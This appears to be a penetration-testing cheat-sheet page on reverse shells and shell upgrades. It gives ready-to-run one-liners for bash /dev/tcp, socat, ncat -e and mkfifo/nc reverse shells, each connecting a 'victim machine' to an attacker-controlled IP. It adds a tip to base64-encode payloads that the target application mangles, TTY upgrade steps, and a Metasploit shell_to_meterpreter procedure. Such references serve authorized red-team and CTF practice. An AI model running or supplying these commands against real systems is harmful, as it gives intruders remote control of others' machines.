Shells
Bash
The classic bash-based reverse shell:
/bin/bash -i >& /dev/tcp/TargetIP/TargetPort 0>&1
Note: If the payload doesn't work because redirection or ampersand symbols behave weird in the vulnerable application, then base64 encoding the payload often works well.
Socat TTY Shell
Do this for a full socat shell, no need to upgrade it. You need socat installed or a socat static binary for this, though.
On kali:
socat file:`tty`,raw,echo=0 tcp-listen:4444
On the victim machine:
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP_ADDRESS_HERE:4444
Once the connection is made, you probably want to increase the terminal size (run in the reverse shell on the victim machine):
stty rows 57 cols 211
Ncat
Listen to port 8001 on attacker machine:
sudo nc -lnvp 8001
Run ncat on the victim machine:
ncat ATTACKER_IP_HERE 8001 -e /bin/bash
Note: The command is ncat, not nc or netcat. There is a difference!
Mkfifo
sh
-based mkfifo reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP_HERE ATTACKER_PORT_HERE >/tmp/f
Upgrading Normal Shells to TTY shells
Switch From ZSH To Bash
Warning: This doesn't work if your attacking machine uses zsh!
You can temporarily switch to bash:
exec bash --login
You can confirm you're using bash with:
ps -p $$
Upgrade the Shell Using Python
Run this in the reverse shell to upgrade it. Don't worry if your terminal turns weird temporarily.
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm
Upgrade the Shell Without Python
script -qc "/bin/bash -i" /dev/null
CTRL+Z
stty raw -echo
fg
export TERM=xterm
Upgrading Normal Shells to Meterpreter
Run msfconsole
. Create a listener using multi/handler
:
use exploit/multi/handler
set lhost YOUR_IP_ADDRESS
set lport 4444
run
Then use one of the above reverse shells to connect to the listener. Once you have the shell, press CTRL + Z
to background the shell session. It will tell you the session number. Keep that in mind.
Next:
use post/multi/manage/shell_to_meterpreter
set session SESSION_NUMBER
run
Once the upgrade finishes, you'll be able to see your new session:
sessions -l
Note: There's a long-standing bug where it seems to get stuck on "Stopping exploit/multi/handler". Just press enter, it's not actually stuck.
Interact with the new session with:
sessions -i NEW_SESSION_NUMBER
Last updated
Was this helpful?